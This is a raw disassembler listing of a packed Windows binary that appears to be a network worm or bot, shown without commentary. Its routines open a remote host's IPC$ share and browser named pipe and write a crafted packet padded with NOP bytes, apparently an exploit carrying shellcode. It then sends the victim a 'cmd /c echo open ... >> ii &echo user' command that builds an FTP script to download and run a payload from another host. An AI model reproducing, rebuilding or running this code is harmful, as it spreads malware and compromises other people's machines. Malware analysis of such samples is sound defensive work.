jnz short loc_40D5DC
mov eax, offset dword_4276A0
loc_40D5DC: ; CODE XREF: sub_40D561+74�j
mov [edi+4], eax
mov ecx, [ebx+8]
mov [edi+8], ecx
mov ecx, [ebx+0Ch]
mov [edi+0Ch], ecx
inc byte ptr [eax-1]
jmp short loc_40D626
; ---------------------------------------------------------------------------
loc_40D5F0: ; CODE XREF: sub_40D561+4E�j
; sub_40D561+52�j ...
push 1
push esi
mov ecx, edi
call sub_40D62F
test al, al
jz short loc_40D626
mov eax, [ebx+4]
test eax, eax
jnz short loc_40D60A
mov eax, offset dword_4276A0
loc_40D60A: ; CODE XREF: sub_40D561+A2�j
mov ecx, [ebp+arg_4]
push esi
add eax, ecx
push eax
push dword ptr [edi+4]
call sub_41C310
mov eax, [edi+4]
add esp, 0Ch
mov [edi+8], esi
and byte ptr [eax+esi], 0
loc_40D626: ; CODE XREF: sub_40D561+4A�j
; sub_40D561+8D�j ...
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_40D561 endp
; =============== S U B R O U T I N E =======================================
sub_40D62F proc near ; CODE XREF: sub_40D07D+3D�p
; sub_40D4B1+28�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
cmp edi, 0FFFFFFFDh
jbe short loc_40D641
call sub_42669A
loc_40D641: ; CODE XREF: sub_40D62F+B�j
mov ecx, [esi+4]
xor edx, edx
cmp ecx, edx
jz short loc_40D66A
mov al, [ecx-1]
cmp al, dl
jz short loc_40D66A
cmp al, 0FFh
jz short loc_40D66A
cmp edi, edx
jnz short loc_40D6A5
dec al
push edx
mov [ecx-1], al
loc_40D65F: ; CODE XREF: sub_40D62F+47�j
mov ecx, esi
call sub_40D6B4
loc_40D666: ; CODE XREF: sub_40D62F+4B�j
; sub_40D62F+52�j
xor al, al
jmp short loc_40D6AF
; ---------------------------------------------------------------------------
loc_40D66A: ; CODE XREF: sub_40D62F+19�j
; sub_40D62F+20�j ...
cmp edi, edx
jnz short loc_40D683
cmp [esp+8+arg_4], dl
jz short loc_40D678
push 1
jmp short loc_40D65F
; ---------------------------------------------------------------------------
loc_40D678: ; CODE XREF: sub_40D62F+43�j
cmp ecx, edx
jz short loc_40D666
mov [esi+8], edx
mov [ecx], dl
jmp short loc_40D666
; ---------------------------------------------------------------------------
loc_40D683: ; CODE XREF: sub_40D62F+3D�j
cmp [esp+8+arg_4], dl
jz short loc_40D6A0
mov eax, [esi+0Ch]
cmp eax, 1Fh
ja short loc_40D695
cmp eax, edi
jnb short loc_40D6AD
loc_40D695: ; CODE XREF: sub_40D62F+60�j
push 1
mov ecx, esi
call sub_40D6B4
jmp short loc_40D6A5
; ---------------------------------------------------------------------------
loc_40D6A0: ; CODE XREF: sub_40D62F+58�j
cmp [esi+0Ch], edi
jnb short loc_40D6AD
loc_40D6A5: ; CODE XREF: sub_40D62F+28�j
; sub_40D62F+6F�j
push edi
mov ecx, esi
call sub_40D78C
loc_40D6AD: ; CODE XREF: sub_40D62F+64�j
; sub_40D62F+74�j
mov al, 1
loc_40D6AF: ; CODE XREF: sub_40D62F+39�j
pop edi
pop esi
retn 8
sub_40D62F endp
; =============== S U B R O U T I N E =======================================
sub_40D6B4 proc near ; CODE XREF: sub_40D07D+1F�p
; sub_40D07D+16A�p ...
arg_0 = byte ptr 4
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_40D6E0
mov eax, [esi+4]
test eax, eax
jz short loc_40D6E0
lea ecx, [eax-1]
mov al, [eax-1]
test al, al
jz short loc_40D6D9
cmp al, 0FFh
jz short loc_40D6D9
dec al
mov [ecx], al
jmp short loc_40D6E0
; ---------------------------------------------------------------------------
loc_40D6D9: ; CODE XREF: sub_40D6B4+19�j
; sub_40D6B4+1D�j
push ecx
call sub_41CC83
pop ecx
loc_40D6E0: ; CODE XREF: sub_40D6B4+8�j
; sub_40D6B4+F�j ...
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
pop esi
retn 4
sub_40D6B4 endp
; =============== S U B R O U T I N E =======================================
sub_40D6F0 proc near ; CODE XREF: UPX0:0040D410�p
; sub_40D849+28�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_4]
push 1
mov esi, ecx
push edi
call sub_40D62F
test al, al
jz short loc_40D71E
push edi
push [esp+0Ch+arg_0]
push dword ptr [esi+4]
call sub_41C310
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [eax+edi], 0
loc_40D71E: ; CODE XREF: sub_40D6F0+12�j
mov eax, esi
pop edi
pop esi
retn 8
sub_40D6F0 endp
; =============== S U B R O U T I N E =======================================
sub_40D725 proc near ; CODE XREF: sub_40D561+39�p
; sub_40D561+45�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, ecx
cmp [edi+8], esi
jnb short loc_40D738
call sub_426573
loc_40D738: ; CODE XREF: sub_40D725+C�j
mov ecx, edi
call sub_40D849
mov eax, [edi+8]
mov ebx, [esp+0Ch+arg_4]
sub eax, esi
cmp eax, ebx
jnb short loc_40D74E
mov ebx, eax
loc_40D74E: ; CODE XREF: sub_40D725+25�j
test ebx, ebx
jbe short loc_40D784
mov ecx, [edi+4]
sub eax, ebx
add ecx, esi
push eax
lea eax, [ecx+ebx]
push eax
push ecx
call sub_41CC90
mov esi, [edi+8]
add esp, 0Ch
sub esi, ebx
mov ecx, edi
push 0
push esi
call sub_40D62F
test al, al
jz short loc_40D784
mov eax, [edi+4]
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_40D784: ; CODE XREF: sub_40D725+2B�j
; sub_40D725+53�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 8
sub_40D725 endp
; =============== S U B R O U T I N E =======================================
sub_40D78C proc near ; CODE XREF: sub_40D62F+79�p
mov eax, offset loc_426E20
call sub_41CC64
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+8]
or edi, 1Fh
mov esi, ecx
cmp edi, 0FFFFFFFDh
mov [ebp-10h], esp
mov [ebp-14h], esi
jbe short loc_40D7B2
mov edi, [ebp+8]
loc_40D7B2: ; CODE XREF: sub_40D78C+21�j
and dword ptr [ebp-4], 0
lea eax, [edi+2]
test eax, eax
jge short loc_40D7BF
xor eax, eax
loc_40D7BF: ; CODE XREF: sub_40D78C+2F�j
push eax
call sub_41CFC5
pop ecx
mov [ebp+8], eax
jmp short loc_40D7F0
; ---------------------------------------------------------------------------
mov eax, [ebp+8]
mov [ebp-18h], eax
add eax, 2
test eax, eax
jge short loc_40D7DA
xor eax, eax
loc_40D7DA: ; CODE XREF: sub_40D78C+4A�j
push eax
call sub_41CFC5
mov [ebp+8], eax
pop ecx
mov eax, offset loc_40D7EA
retn
; ---------------------------------------------------------------------------
loc_40D7EA: ; DATA XREF: sub_40D78C+58�o
mov esi, [ebp-14h]
mov edi, [ebp-18h]
loc_40D7F0: ; CODE XREF: sub_40D78C+3D�j
mov eax, [esi+8]
test eax, eax
jbe short loc_40D80E
cmp eax, edi
jbe short loc_40D7FD
mov eax, edi
loc_40D7FD: ; CODE XREF: sub_40D78C+6D�j
push eax
mov eax, [ebp+8]
push dword ptr [esi+4]
inc eax
push eax
call sub_41C310
add esp, 0Ch
loc_40D80E: ; CODE XREF: sub_40D78C+69�j
mov ebx, [esi+8]
push 1
mov ecx, esi
call sub_40D6B4
mov eax, [ebp+8]
inc eax
mov [esi+4], eax
and byte ptr [eax-1], 0
cmp ebx, edi
mov [esi+0Ch], edi
ja short loc_40D82E
mov edi, ebx
loc_40D82E: ; CODE XREF: sub_40D78C+9E�j
mov eax, [esi+4]
mov ecx, [ebp-0Ch]
mov [esi+8], edi
and byte ptr [eax+edi], 0
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_40D78C endp
; =============== S U B R O U T I N E =======================================
sub_40D849 proc near ; CODE XREF: sub_40D725+15�p
push esi
push edi
mov edi, ecx
mov esi, [edi+4]
test esi, esi
jz short loc_40D876
mov al, [esi-1]
test al, al
jz short loc_40D876
cmp al, 0FFh
jz short loc_40D876
push 1
call sub_40D6B4
push esi
call sub_41AFE0
pop ecx
push eax
push esi
mov ecx, edi
call sub_40D6F0
loc_40D876: ; CODE XREF: sub_40D849+9�j
; sub_40D849+10�j ...
pop edi
pop esi
retn
sub_40D849 endp
; =============== S U B R O U T I N E =======================================
sub_40D879 proc near ; DATA XREF: UPX0:00429008�o
test ds:byte_4DBC74, 1
jnz short loc_40D889
or ds:byte_4DBC74, 1
loc_40D889: ; CODE XREF: sub_40D879+7�j
jmp $+5
push offset nullsub_1
call sub_41D040
pop ecx
retn
sub_40D879 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40D89B proc near ; DATA XREF: UPX0:0042900C�o
jmp $+5
sub_40D89B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40D8A0 proc near
mov eax, dword_4328C0
add eax, 6
mov ds:dword_4CE374, eax
retn
sub_40D8A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D8AE proc near ; CODE XREF: sub_40D8AE+D0�p
; sub_40D99C+471�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_40D8C2
or [ebp+arg_7], 1
jmp short loc_40D8C6
; ---------------------------------------------------------------------------
loc_40D8C2: ; CODE XREF: sub_40D8AE+C�j
and [ebp+arg_7], 0FEh
loc_40D8C6: ; CODE XREF: sub_40D8AE+12�j
mov ecx, [ebp+arg_24]
mov ebx, [ebp+arg_20]
movzx eax, cx
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_40D8EA
or [ebp+arg_7], 2
and [ebp+arg_2B], 0
lea eax, [ebx+18h]
mov [ebp+arg_14], ebx
mov [ebp+arg_C], ax
jmp short loc_40D8FC
; ---------------------------------------------------------------------------
loc_40D8EA: ; CODE XREF: sub_40D8AE+26�j
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_C], cx
mov [ebp+arg_14], eax
mov [ebp+arg_2B], 1
loc_40D8FC: ; CODE XREF: sub_40D8AE+3A�j
movzx eax, [ebp+arg_C]
push eax
mov [ebp+var_4], eax
call sub_41B4D5
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jz loc_40D995
push 6
lea esi, [ebp+arg_4]
pop ecx
mov edi, eax
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_41C310
add esp, 0Ch
lea eax, [ebp+var_8]
push 0
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call dword_4270E0 ; WriteFile
test eax, eax
jz short loc_40D98C
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_40D98C
push [ebp+arg_20]
call sub_41B0B1
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_40D988
push 0
sub ebx, edi
push [ebp+arg_24]
add edi, esi
lea esi, [ebp+arg_4]
push ebx
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
rep movsd
call sub_40D8AE
add esp, 2Ch
jmp short loc_40D997
; ---------------------------------------------------------------------------
loc_40D988: ; CODE XREF: sub_40D8AE+B3�j
mov al, 1
jmp short loc_40D997
; ---------------------------------------------------------------------------
loc_40D98C: ; CODE XREF: sub_40D8AE+9C�j
; sub_40D8AE+A4�j
push [ebp+arg_20]
call sub_41B0B1
pop ecx
loc_40D995: ; CODE XREF: sub_40D8AE+61�j
xor al, al
loc_40D997: ; CODE XREF: sub_40D8AE+D8�j
; sub_40D8AE+DC�j
pop edi
pop esi
pop ebx
leave
retn
sub_40D8AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D99C proc near ; CODE XREF: UPX0:0040DF9A�p
var_60DC = byte ptr -60DCh
var_40DC = byte ptr -40DCh
var_20DC = byte ptr -20DCh
var_DC = byte ptr -0DCh
var_C8 = dword ptr -0C8h
var_BC = byte ptr -0BCh
var_B8 = byte ptr -0B8h
var_B7 = byte ptr -0B7h
var_B6 = byte ptr -0B6h
var_B5 = byte ptr -0B5h
var_B4 = dword ptr -0B4h
var_B0 = word ptr -0B0h
var_AE = word ptr -0AEh
var_AC = dword ptr -0ACh
var_A8 = word ptr -0A8h
var_A6 = word ptr -0A6h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = word ptr -9Ch
var_9A = byte ptr -9Ah
var_98 = byte ptr -98h
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = word ptr -60h
var_5C = byte ptr -5Ch
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = qword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 60DCh
call sub_41BB20
push ebx
push esi
push edi
push offset a_ ; "."
push [ebp+arg_0]
call sub_41D160
pop ecx
xor ebx, ebx
test eax, eax
pop ecx
jz short loc_40DA0F
push [ebp+arg_0]
mov esi, 2000h
lea eax, [ebp+var_20DC]
push offset aSIpc ; "\\\\%s\\ipc$"
push esi
push eax
call sub_41B980
push 20h
lea eax, [ebp+var_DC]
push ebx
push eax
call sub_41B590
lea eax, [ebp+var_20DC]
add esp, 1Ch
mov [ebp+var_C8], eax
mov eax, offset byte_43D808
push ebx
push eax
push eax
lea eax, [ebp+var_DC]
push eax
call sub_426750
jmp short loc_40DA14
; ---------------------------------------------------------------------------
loc_40DA0F: ; CODE XREF: sub_40D99C+23�j
mov esi, 2000h
loc_40DA14: ; CODE XREF: sub_40D99C+71�j
push [ebp+arg_0]
lea eax, [ebp+var_40DC]
push offset aSPipeBrowser ; "\\\\%s\\pipe\\browser"
push esi
push eax
call sub_41B980
add esp, 10h
lea eax, [ebp+var_40DC]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call dword_4270EC ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_40DA58
loc_40DA51: ; CODE XREF: sub_40D99C+194�j
; sub_40D99C+36A�j ...
xor al, al
jmp loc_40DE9C
; ---------------------------------------------------------------------------
loc_40DA58: ; CODE XREF: sub_40D99C+B3�j
push 48h
lea eax, [ebp+var_B8]
push ebx
push eax
call sub_41B590
push 10h
mov [ebp+var_B8], 5
pop eax
mov [ebp+var_B7], bl
push 1
mov [ebp+var_B4], eax
pop edi
mov [ebp+var_B6], 0Bh
push eax
lea eax, [ebp+var_98]
push offset dword_432914
push eax
mov [ebp+var_B5], 3
mov [ebp+var_B0], 48h
mov [ebp+var_AE], bx
mov [ebp+var_AC], ebx
mov [ebp+var_A8], 10B8h
mov [ebp+var_A6], 10B8h
mov [ebp+var_A4], ebx
mov [ebp+var_A0], edi
mov [ebp+var_9C], bx
mov [ebp+var_9A], 1
call sub_41C310
push 10h
lea eax, [ebp+var_84]
push offset dword_432900
push eax
mov [ebp+var_88], 3
call sub_41C310
add esp, 24h
lea eax, [ebp+var_BC]
mov [ebp+var_74], 2
push ebx
push eax
lea eax, [ebp+var_B8]
push 48h
push eax
push [ebp+var_4]
call dword_4270E0 ; WriteFile
test eax, eax
jnz short loc_40DB35
loc_40DB27: ; CODE XREF: sub_40D99C+265�j
push [ebp+var_4]
call dword_427068 ; CloseHandle
jmp loc_40DA51
; ---------------------------------------------------------------------------
loc_40DB35: ; CODE XREF: sub_40D99C+189�j
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_60DC]
push esi
push eax
push [ebp+var_4]
call dword_4270E8 ; ReadFile
push ebx
call sub_41D081
push eax
call sub_41B8D8
push 14h
lea eax, [ebp+var_70]
push 41h
push eax
call sub_41B590
push 1Ch
lea eax, [ebp+var_30]
push 41h
push eax
call sub_41B590
add esp, 20h
call sub_41B8E2
mov esi, [ebp+arg_4]
mov [ebp+var_70], eax
mov [ebp+var_64], edi
mov [ebp+var_68], ebx
lea esi, [esi+esi*4]
mov [ebp+var_6C], edi
shl esi, 2
mov [ebp+var_60], bx
cmp byte_4328A8[esi], bl
jz short loc_40DBAC
push 4
mov [ebp+var_24], edi
mov [ebp+var_28], ebx
mov [ebp+var_2C], edi
push offset dword_4CE37C
jmp short loc_40DBBF
; ---------------------------------------------------------------------------
loc_40DBAC: ; CODE XREF: sub_40D99C+1FC�j
push 2
mov [ebp+var_28], ebx
pop eax
push 4
mov [ebp+var_24], eax
mov [ebp+var_2C], eax
push (offset loc_4328F7+1)
loc_40DBBF: ; CODE XREF: sub_40D99C+20E�j
lea eax, [ebp+var_20]
push eax
call sub_41C310
add esp, 0Ch
call sub_41B8E2
mov edi, 0FAh
cdq
mov ecx, edi
idiv ecx
inc edx
mov [ebp+var_30], edx
call sub_41B8E2
cdq
idiv edi
mov eax, dword_43289C[esi]
mov [ebp+var_18], ebx
push eax
mov [ebp+arg_0], eax
inc edx
mov [ebp+var_1C], edx
call sub_41B4D5
mov edi, eax
pop ecx
cmp edi, ebx
jz loc_40DB27
mov eax, [ebp+arg_0]
add eax, 0FFFFFFFEh
push eax
push 90h
push edi
call sub_41B590
mov eax, [ebp+arg_0]
push 2
push ebx
lea eax, [edi+eax-2]
push eax
call sub_41B590
mov eax, dword_4328A4[esi]
push 7
add eax, edi
push offset dword_432890
push eax
mov [ebp+arg_4], eax
call sub_41C310
mov eax, [ebp+arg_4]
push 15Ch
add eax, 7
push offset dword_432730
push eax
call sub_41C310
mov eax, dword_4328A0[esi]
add esp, 30h
cmp byte_4328A8[esi], bl
mov [ebp+arg_4], eax
jz short loc_40DCB8
push 4
add eax, edi
push offset dword_4CE374
push eax
call sub_41C310
add [ebp+arg_4], 0Ch
mov esi, offset dword_4328C0
mov eax, [ebp+arg_4]
push 4
add eax, edi
push esi
push eax
call sub_41C310
mov eax, [ebp+arg_4]
push 4
push esi
lea eax, [eax+edi+24h]
push eax
mov [ebp+arg_4], eax
call sub_41C310
mov eax, [ebp+arg_4]
push 4
add eax, 0Ch
push esi
push eax
call sub_41C310
add esp, 30h
jmp short loc_40DCE0
; ---------------------------------------------------------------------------
loc_40DCB8: ; CODE XREF: sub_40D99C+2CD�j
add eax, edi
mov [ebp+var_8], 10h
mov [ebp+arg_4], eax
mov esi, offset dword_4328C0
loc_40DCC9: ; CODE XREF: sub_40D99C+342�j
push 4
push esi
push [ebp+arg_4]
call sub_41C310
add [ebp+arg_4], 4
add esp, 0Ch
dec [ebp+var_8]
jnz short loc_40DCC9
loc_40DCE0: ; CODE XREF: sub_40D99C+31A�j
mov eax, [ebp+arg_0]
add eax, 42h
push eax
call sub_41B4D5
mov esi, eax
pop ecx
cmp esi, ebx
mov [ebp+var_8], esi
jnz short loc_40DD0B
push [ebp+var_4]
call dword_427068 ; CloseHandle
push edi
call sub_41B0B1
pop ecx
jmp loc_40DA51
; ---------------------------------------------------------------------------
loc_40DD0B: ; CODE XREF: sub_40D99C+358�j
mov eax, [ebp+arg_0]
add eax, 42h
push eax
push ebx ; double
push esi
call sub_41B590
lea eax, [ebp+var_70]
push 14h
push eax
push esi
call sub_41C310
mov eax, [ebp+arg_0]
mov dword ptr [ebp+var_10+4], ebx
mov dword ptr [ebp+var_10], eax
add esp, 10h
fild [ebp+var_10]
fmul flt_4276A4
fstp [esp+0Ch+var_10+4]
call sub_41C7BF
call sub_41C798
push [ebp+arg_0]
mov [esi+1Ch], eax
mov [esi+18h], ebx
mov eax, [esi+1Ch]
mov [esi+14h], eax
lea eax, [esi+20h]
push edi
push eax
call sub_41C310
mov eax, [ebp+arg_0]
add esp, 14h
add eax, 20h
test al, 3
mov [ebp+arg_4], eax
jz short loc_40DD78
loc_40DD70: ; CODE XREF: sub_40D99C+3D7�j
inc eax
test al, 3
jnz short loc_40DD70
mov [ebp+arg_4], eax
loc_40DD78: ; CODE XREF: sub_40D99C+3D2�j
lea ecx, [ebp+var_30]
push 1Ch
add eax, esi
push ecx
push eax
call sub_41C310
add [ebp+arg_4], 1Ch
push edi
call sub_41B0B1
push 18h
lea eax, [ebp+var_48]
push ebx
push eax
call sub_41B590
push 14h
lea eax, [ebp+var_5C]
push ebx
push eax
mov [ebp+var_48], 5
mov [ebp+var_47], bl
mov [ebp+var_46], bl
mov [ebp+var_45], 3
mov [ebp+var_44], 10h
mov [ebp+var_3E], bx
mov [ebp+var_3C], ebx
mov [ebp+var_34], bx
mov [ebp+var_32], 1Fh
call sub_41B590
add esp, 28h
push ebx
push ebx
push 1
push ebx
call dword_4270E4 ; CreateEventA
mov [ebp+var_4C], eax
mov byte ptr [ebp+arg_0+3], bl
mov dword ptr [ebp+var_10+4], ebx
loc_40DDE5: ; CODE XREF: sub_40D99C+4D3�j
cmp dword ptr [ebp+var_10+4], 2
jge loc_40DE7A
push 1
push 10B8h
push [ebp+arg_4]
inc dword ptr [ebp+var_10+4]
push esi
lea esi, [ebp+var_48]
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+var_4]
rep movsd
call sub_40D8AE
add esp, 2Ch
test al, al
jz short loc_40DE77
cmp [ebp+var_4C], ebx
jz short loc_40DE69
lea eax, [ebp+var_5C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_60DC]
push 2000h
push eax
push [ebp+var_4]
call dword_4270E8 ; ReadFile
test eax, eax
jnz short loc_40DE50
call dword_42708C ; RtlGetLastWin32Error
cmp eax, 3E5h
jnz loc_40DA51
loc_40DE50: ; CODE XREF: sub_40D99C+4A1�j
push 3E8h
push [ebp+var_4C]
call dword_4270A0 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40DE69
mov byte ptr [ebp+arg_0+3], 1
loc_40DE69: ; CODE XREF: sub_40D99C+480�j
; sub_40D99C+4C7�j
cmp byte ptr [ebp+arg_0+3], bl
mov esi, [ebp+var_8]
jz loc_40DDE5
jmp short loc_40DE7A
; ---------------------------------------------------------------------------
loc_40DE77: ; CODE XREF: sub_40D99C+47B�j
mov esi, [ebp+var_8]
loc_40DE7A: ; CODE XREF: sub_40D99C+44D�j
; sub_40D99C+4D9�j
push [ebp+var_4]
mov edi, dword_427068
call edi ; CloseHandle
push esi
call sub_41B0B1
cmp [ebp+var_4C], ebx
pop ecx
jz short loc_40DE96
push [ebp+var_4C]
call edi ; CloseHandle
loc_40DE96: ; CODE XREF: sub_40D99C+4F3�j
cmp byte ptr [ebp+arg_0+3], bl
setnz al
loc_40DE9C: ; CODE XREF: sub_40D99C+B7�j
pop edi
pop esi
pop ebx
leave
retn
sub_40D99C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DEA1 proc near ; CODE XREF: UPX0:0040DFB8�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call dword_42720C ; inet_addr
push [ebp+arg_BC]
mov [ebp+var_C], eax
call dword_427210 ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call dword_427220 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40DF6F
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_427214 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40DF6F
mov edi, 400h
push esi
mov esi, dword_427218
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
mov eax, offset byte_429110
push eax
push eax
push ds:dword_4CB390
push [ebp+arg_0]
call sub_40AC10
pop ecx
push eax
push offset aCmdCEchoOpen_0 ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp+var_1A0]
push 190h
push eax
call sub_41B980
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call dword_427224 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40DF73
loc_40DF6F: ; CODE XREF: sub_40DEA1+50�j
; sub_40DEA1+62�j
xor eax, eax
jmp short loc_40DF8A
; ---------------------------------------------------------------------------
loc_40DF73: ; CODE XREF: sub_40DEA1+CC�j
push 0
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
push ebx
call dword_42721C ; closesocket
push 1
pop eax
loc_40DF8A: ; CODE XREF: sub_40DEA1+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40DEA1 endp
; ---------------------------------------------------------------------------
push ebx
push esi
push edi
xor ebx, ebx
loc_40DF94: ; CODE XREF: UPX0:0040DFDA�j
lea eax, [esp+14h]
push ebx
push eax
call sub_40D99C
pop ecx
test al, al
pop ecx
jz short loc_40DFC7
push 65h
lea esi, [esp+14h]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40DEA1
add esp, 0C0h
test eax, eax
jnz short loc_40DFDC
loc_40DFC7: ; CODE XREF: UPX0:0040DFA3�j
test ebx, ebx
jnz short loc_40DFD6
push 7D0h
call dword_427078 ; Sleep
loc_40DFD6: ; CODE XREF: UPX0:0040DFC9�j
inc ebx
cmp ebx, 2
jb short loc_40DF94
loc_40DFDC: ; CODE XREF: UPX0:0040DFC5�j
push 1
pop eax
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DFE3 proc near ; CODE XREF: sub_40E0D1+91�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call dword_42720C ; inet_addr
push [ebp+arg_BC]
mov [ebp+var_C], eax
call dword_427210 ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call dword_427220 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40E0B1
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_427214 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40E0B1
mov edi, 400h
push esi
mov esi, dword_427218
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
mov eax, offset byte_429110
push eax
push eax
push ds:dword_4CB390
push [ebp+arg_0]
call sub_40AC10
pop ecx
push eax
push offset aCmdCEchoOpen_0 ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp+var_1A0]
push 190h
push eax
call sub_41B980
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call dword_427224 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40E0B5
loc_40E0B1: ; CODE XREF: sub_40DFE3+50�j
; sub_40DFE3+62�j
xor eax, eax
jmp short loc_40E0CC
; ---------------------------------------------------------------------------
loc_40E0B5: ; CODE XREF: sub_40DFE3+CC�j
push 0
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
push ebx
call dword_42721C ; closesocket
push 1
pop eax
loc_40E0CC: ; CODE XREF: sub_40DFE3+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40DFE3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E0D1 proc near ; CODE XREF: sub_40C125+1EA�p
; DATA XREF: UPX0:off_431B04�o
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
push ebp
mov ebp, esp
sub esp, 10h
push esi
lea eax, [ebp+arg_4]
push edi
push eax
mov [ebp+var_10], 2
call ds:dword_4CB694 ; inet_addr
push [ebp+arg_A0]
mov [ebp+var_C], eax
call ds:dword_4CB654 ; htons
push 6
push 1
push 2
mov [ebp+var_E], ax
call dword_427220 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
